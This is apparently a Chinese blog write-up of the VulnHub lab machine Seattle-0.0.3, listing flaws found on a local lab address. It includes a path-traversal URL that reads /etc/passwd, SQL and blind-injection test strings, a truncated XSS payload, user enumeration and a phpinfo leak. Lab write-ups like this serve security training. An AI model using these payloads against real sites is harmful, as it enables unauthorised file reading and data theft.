vulnhub Seattle-0.0.3

环境:vuluhub Seattle-0.0.3

 1.catelogue处任意文件下载(目录穿越)

http://192.168.85.139/download.php?item=../../../../../../etc/passwd

有个admin目录,可以下载里面的文件进行读取

vulnhub Seattle-0.0.3_第1张图片

2.cltohes详情页面处(参数prod)存在sql报错注入

http://192.168.85.139/details.php?prod=5&type=2

vulnhub Seattle-0.0.3_第2张图片

 3.vily处存在布尔盲注(或时间盲注)

http://192.168.85.139/?type=1 and 1=1

4.blog处用户名泄露

vulnhub Seattle-0.0.3_第3张图片

 5.登陆处存在用户名枚举

vulnhub Seattle-0.0.3_第4张图片

vulnhub Seattle-0.0.3_第5张图片

 6.blog处存在xss

http://192.168.85.139/blog.php?author=">

vulnhub Seattle-0.0.3_第6张图片

 7.phpinfo页面泄露

http://192.168.85.139/info.php

vulnhub Seattle-0.0.3_第7张图片

 

你可能感兴趣的:(靶机及靶场通关,网络安全)